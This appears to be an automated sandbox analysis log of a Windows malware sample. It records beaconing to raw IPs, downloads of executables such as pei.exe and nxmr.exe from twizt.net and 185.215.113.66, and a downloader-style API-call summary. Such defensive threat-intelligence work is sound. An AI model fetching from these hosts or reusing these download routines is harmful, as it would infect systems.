Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141

Source: unknown	TCP traffic detected without corresponding DNS query: 109.68.122.14
Source: unknown	TCP traffic detected without corresponding DNS query: 109.68.122.14
Source: unknown	TCP traffic detected without corresponding DNS query: 109.68.122.14
Source: unknown	TCP traffic detected without corresponding DNS query: 109.68.122.14
Source: unknown	TCP traffic detected without corresponding DNS query: 109.68.122.14
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.84
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.85.66

Source: C:\Users\user\AppData\Local\Temp\34D7.exe

Code function: 3_2_00251100 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,wsprintfW,DeleteFileW,CloseHandle,wsprintfW,InternetCloseHandle,InternetCloseHandle,Sleep,Sleep,rand,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,

3_2_00251100

Source: global traffic	HTTP traffic detected: GET /pei.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /rh.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: twizt.net
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /IBSTSWSONL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /json.gp?ip= HTTP/1.1User-Agent: MSIEHost: www.geoplugin.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
Source: global traffic	HTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
Source: global traffic	HTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141

Source: global traffic	DNS traffic detected: DNS query: twizt.net
Source: global traffic	DNS traffic detected: DNS query: www.geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: twizthash.net

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:32:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
